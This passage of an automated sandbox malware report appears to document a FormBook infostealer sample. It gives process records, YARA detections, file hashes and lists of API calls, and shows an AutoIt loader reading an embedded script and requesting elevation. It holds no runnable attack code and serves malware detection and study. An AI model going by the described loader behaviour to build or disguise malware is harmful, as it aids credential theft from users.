Commandline:	"C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe"
Imagebase:	0xb70000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4621737352.0000000005960000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4621737352.0000000005960000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	02:28:10
Start date:	15/01/2025
Path:	C:\Windows\SysWOW64\netbtugc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\netbtugc.exe"
Imagebase:	0xfb0000
File size:	22'016 bytes
MD5 hash:	EE7BBA75B36D54F9E420EB6EE960D146
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4621809229.00000000008B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4621809229.00000000008B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4621727339.0000000000870000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4621727339.0000000000870000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4615833693.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4615833693.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	02:28:23
Start date:	15/01/2025
Path:	C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe"
Imagebase:	0xb70000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4623753235.0000000004BC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4623753235.0000000004BC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	02:28:35
Start date:	15/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff728280000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.7%
Dynamic/Decrypted Code Coverage:	2%
Signature Coverage:	3.6%
Total number of Nodes:	1667
Total number of Limit Nodes:	27

Executed Functions

Function 001442DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0014430D

Part of subcall function 00146B57: _wcslen.LIBCMT ref: 00146B6A

GetCurrentProcess.KERNEL32(?,001DCB64,00000000,?,?), ref: 00144422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00144429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00144454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00144466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00144474
FreeLibrary.KERNEL32(00000000,?,?), ref: 0014447B
GetSystemInfo.KERNEL32(?,?,?), ref: 001444A0

Strings

|O, xrefs: 001836F8
kernel32.dll, xrefs: 0014444F
GetNativeSystemInfo, xrefs: 00144460

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: b1ad9c8795d6014eb96b83267237341a534f071edab4a02c9d9efb826878949f
Instruction ID: 74a03edb0a0015d1920fcd8189615d1a0b2f188872c7bce5a95707bfeeba449e
Opcode Fuzzy Hash: b1ad9c8795d6014eb96b83267237341a534f071edab4a02c9d9efb826878949f
Instruction Fuzzy Hash: 0BA1D46190A2D4CFCB15D7687C4C3D97FA46B36700B1CC8DAE27193A79DB3146A4CB61

Function 001442A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,001450AA,?,?,00000000,00000000), ref: 001442B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,001450AA,?,?,00000000,00000000), ref: 001442C9
LoadResource.KERNEL32(?,00000000,?,?,001450AA,?,?,00000000,00000000,?,?,?,?,?,?,00144F20), ref: 001835BE
SizeofResource.KERNEL32(?,00000000,?,?,001450AA,?,?,00000000,00000000,?,?,?,?,?,?,00144F20), ref: 001835D3
LockResource.KERNEL32(001450AA,?,?,001450AA,?,?,00000000,00000000,?,?,?,?,?,?,00144F20,?), ref: 001835E6

Strings

SCRIPT, xrefs: 001442BF

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: f0ec60015a511fb7322c291f0113e54b8e48c2face4de46b32436dacd25ed868
Instruction ID: b830b4bb7428af1d13fb697ab4139691a0ca3471ae15e9ebb2317921b9a543d8
Opcode Fuzzy Hash: f0ec60015a511fb7322c291f0113e54b8e48c2face4de46b32436dacd25ed868
Instruction Fuzzy Hash: A1118EB0202701BFDB218BA5EC48F677BB9EBC5B51F14456EF442D66A0DBB1DC41CA60

Function 00182BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 00142B6B

Part of subcall function 00143A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00211418,?,00142E7F,?,?,?,00000000), ref: 00143A78

Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,00202224), ref: 00182C10
ShellExecuteW.SHELL32(00000000,?,?,00202224), ref: 00182C17

Strings

runas, xrefs: 00182C0B

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: b52dffc5f52686b5561cd7a6d08fcfd9e730bca3f489d1d7a816cb2a96e15f89
Instruction ID: c5f9640444f3808b05de9fbc0ddf77db07d28595759662aa469e6f1400564307
Opcode Fuzzy Hash: b52dffc5f52686b5561cd7a6d08fcfd9e730bca3f489d1d7a816cb2a96e15f89
Instruction Fuzzy Hash: 42110331209306AAC704FF60E8559AEB7A4AFB1700F84042DF196130B3CF318A99C752

Function 0014D730 Relevance: 21.6, APIs: 14, Instructions: 631windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 0014D807
timeGetTime.WINMM ref: 0014DA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0014DB28
TranslateMessage.USER32(?), ref: 0014DB7B
DispatchMessageW.USER32(?), ref: 0014DB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0014DB9F
Sleep.KERNEL32(0000000A), ref: 0014DBB1

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: a60caf7edc774e086138f9a4f3ffade10ff9f6d4bdbbfc15a04670504085b233
Instruction ID: 35bd73503aba653dad6c34fdd03a75bdd7385fba166a76968859282d0e8c44d5
Opcode Fuzzy Hash: a60caf7edc774e086138f9a4f3ffade10ff9f6d4bdbbfc15a04670504085b233
Instruction Fuzzy Hash: 3342D130604342EFEF28CF24D889BAAB7E1FF56314F55855DE466872A1D770E884CB92

Function 00142CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00142D07
RegisterClassExW.USER32(00000030), ref: 00142D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00142D42
InitCommonControlsEx.COMCTL32(?), ref: 00142D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00142D6F
LoadIconW.USER32(000000A9), ref: 00142D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00142D94

Strings

0, xrefs: 00142CE9
AutoIt v3 GUI, xrefs: 00142D23
TaskbarCreated, xrefs: 00142D37
+, xrefs: 00142CF0

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 071ca7cb5caddd635e1fefcd16f41e9d7bff53223f9d201984eaa0498af64087
Instruction ID: be970012decfd0d3f55c93d3912a25682f92e352ad7c97aeb0c961ddd479c093
Opcode Fuzzy Hash: 071ca7cb5caddd635e1fefcd16f41e9d7bff53223f9d201984eaa0498af64087
Instruction Fuzzy Hash: B121C7B5902319EFDB00DFA4ED49BDDBBB8FB08705F00851AF621A62A0DBB54554CF91

Function 0018065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0018039A: CreateFileW.KERNELBASE(00000000,00000000,?,00180704,?,?,00000000,?,00180704,00000000,0000000C), ref: 001803B7

GetLastError.KERNEL32 ref: 0018076F
__dosmaperr.LIBCMT ref: 00180776
GetFileType.KERNELBASE(00000000), ref: 00180782
GetLastError.KERNEL32 ref: 0018078C
__dosmaperr.LIBCMT ref: 00180795
CloseHandle.KERNEL32(00000000), ref: 001807B5
CloseHandle.KERNEL32(?), ref: 001808FF
GetLastError.KERNEL32 ref: 00180931
__dosmaperr.LIBCMT ref: 00180938

Strings

H, xrefs: 001808BD

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 06d4e71afce8f837d2a4df43e05c23aa22d688b847b9fcf38d785f3fd1f81467
Instruction ID: 6174ac79a36075fd76cff8b962cc09c35afabc9019e42a57b06dcf0f9f581ddb
Opcode Fuzzy Hash: 06d4e71afce8f837d2a4df43e05c23aa22d688b847b9fcf38d785f3fd1f81467
Instruction Fuzzy Hash: 12A12932A001089FDF1AAF68DC967AD7BA0AB1A320F24415DF8159B3D1DB319E57CF91

Function 0014344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00143A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00211418,?,00142E7F,?,?,?,00000000), ref: 00143A78

Part of subcall function 00143357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00143379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0014356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0018318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 001831CE
RegCloseKey.ADVAPI32(?), ref: 00183210
_wcslen.LIBCMT ref: 00183277
_wcslen.LIBCMT ref: 00183286

Strings

\, xrefs: 0018328C
Software\AutoIt v3\AutoIt, xrefs: 00143560
\Include\, xrefs: 00143527
Include, xrefs: 00183184, 001831C5

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: d26d89fb514fb0e12410b0a30481b27026c1491e9f0d76594b2f87f6aadeae74
Instruction ID: 95e938aeb7315032f519daae46a82d76581e84b55849a23ad47db056ba58c2be
Opcode Fuzzy Hash: d26d89fb514fb0e12410b0a30481b27026c1491e9f0d76594b2f87f6aadeae74
Instruction Fuzzy Hash: D0719D71405305DEC314EF29EC869ABBBE8FFA4740F40482EF565971B1EB309A58CB92

Function 00142B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00142B8E
LoadCursorW.USER32(00000000,00007F00), ref: 00142B9D
LoadIconW.USER32(00000063), ref: 00142BB3
LoadIconW.USER32(000000A4), ref: 00142BC5
LoadIconW.USER32(000000A2), ref: 00142BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00142BEF
RegisterClassExW.USER32(?), ref: 00142C40

Part of subcall function 00142CD4: GetSysColorBrush.USER32(0000000F), ref: 00142D07
Part of subcall function 00142CD4: RegisterClassExW.USER32(00000030), ref: 00142D31
Part of subcall function 00142CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00142D42
Part of subcall function 00142CD4: InitCommonControlsEx.COMCTL32(?), ref: 00142D5F
Part of subcall function 00142CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00142D6F
Part of subcall function 00142CD4: LoadIconW.USER32(000000A9), ref: 00142D85
Part of subcall function 00142CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00142D94

Strings

0, xrefs: 00142C0F
AutoIt v3, xrefs: 00142C2F
#, xrefs: 00142C16

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 3e0c959d06d48fb1c3eb13acd035ed84af3a04a5421d3c9e0e98e97b26a9fea6
Instruction ID: 9757f2bc64a2c0886aab0693405d45996ca3f8e2b0c6523b546fb2b9e128e33a
Opcode Fuzzy Hash: 3e0c959d06d48fb1c3eb13acd035ed84af3a04a5421d3c9e0e98e97b26a9fea6
Instruction Fuzzy Hash: 4C214C70E02314ABDB109FA5FC59AD9BFB4FB18B50F10849AF620A66A4DBB10560CF90

Function 0014B710 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0014BB4E

Strings

p#!, xrefs: 00190263
p%!, xrefs: 0014B8DC
x#!, xrefs: 00190207
p#!, xrefs: 0019024F
p%!, xrefs: 0014BB32
p#!, xrefs: 0014BA72
p#!, xrefs: 0014BB6B
x#!, xrefs: 00190168

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Init_thread_footer
String ID: p#!$p#!$p#!$p#!$p%!$p%!$x#!$x#!
API String ID: 1385522511-4272460735
Opcode ID: 60907567cce92638725a489af31047cc21bf031b780edf99bca09e4c0aa8aecf
Instruction ID: 2165d5ba08758ea8bcba404a260d04c91d206bac00c391c2145a126ee32fe529
Opcode Fuzzy Hash: 60907567cce92638725a489af31047cc21bf031b780edf99bca09e4c0aa8aecf
Instruction Fuzzy Hash: 4132CD70A08209DFCF29CF54C894ABEB7B9FF58304F158069E915AB261C774EE91CB91

Function 00143170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0014316A,?,?), ref: 001431D8
KillTimer.USER32(?,00000001,?,?,?,?,?,0014316A,?,?), ref: 00143204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00143227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0014316A,?,?), ref: 00143232
CreatePopupMenu.USER32 ref: 00143246
PostQuitMessage.USER32(00000000), ref: 00143267

Strings

TaskbarCreated, xrefs: 0014322D

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 7b420c408f00370a18c0f5c9c60411b6b1675acd57dad664572e046427afea9f
Instruction ID: 6ed78ae63e93be2787c63c8c024563292799a1b45960dbc48d9585dc9dae7703
Opcode Fuzzy Hash: 7b420c408f00370a18c0f5c9c60411b6b1675acd57dad664572e046427afea9f
Instruction Fuzzy Hash: E8414835210205ABDF192F78AC4DFF93B59E725700F044226FA32862B5DBB19F91DBA1

Function 0014DFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 001932B7
D%!, xrefs: 0014E1E0
D%!D%!, xrefs: 0014E27E
D%!, xrefs: 0019302D
D%!, xrefs: 00192FDA
D%!, xrefs: 0014E4B1

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID:
String ID: D%!$D%!$D%!$D%!$D%!D%!$Variable must be of type 'Object'.
API String ID: 0-2751283870
Opcode ID: 1edcf403aa500a194ea12cd7d07449e15f2186ed0fdaca437ee60f5c7c6d3b7a
Instruction ID: ae38eb82494ab75f07a7b4be4d0ca191e3fa452f8a36b9d78ca89c7c7cb3a877
Opcode Fuzzy Hash: 1edcf403aa500a194ea12cd7d07449e15f2186ed0fdaca437ee60f5c7c6d3b7a
Instruction Fuzzy Hash: A2C2AB75A00205CFCB24CFA8C885AADB7F1FF18310F258569E966AB3A1D371ED51CB91

Function 00F4CF30 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00F4D001
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F4D227

Memory Dump Source

Source File: 00000000.00000002.2160732922.0000000000F4A000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4a000_PO-DOC1522025-12.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
Instruction ID: b8fbcd5763e625911240ebcfe2a067a82e35541c802ddde2299eda42316bcacb
Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
Instruction Fuzzy Hash: 17A11A71E00209EBEF14CFA4C894BEEBBB5FF48314F208559E911BB280D7799A81DB54

Function 00142C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00142C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00142CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,00141CAD,?), ref: 00142CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,00141CAD,?), ref: 00142CCF

Strings

edit, xrefs: 00142CAC
AutoIt v3, xrefs: 00142C89, 00142C8E, 00142C8F

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 98eb3e34cd1e58c0e890594f72b606a219bd82088c682b6b97e6d1aec551d998
Instruction ID: c702d8f6037fe6b1c26705cf1f54a44c921ae58f2df8a44c0fbae6b58c9d5625
